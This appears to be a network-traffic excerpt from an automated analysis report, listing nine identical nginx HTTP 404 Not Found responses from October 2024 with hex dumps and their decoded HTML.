                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:27 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:29 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:53 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:02 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
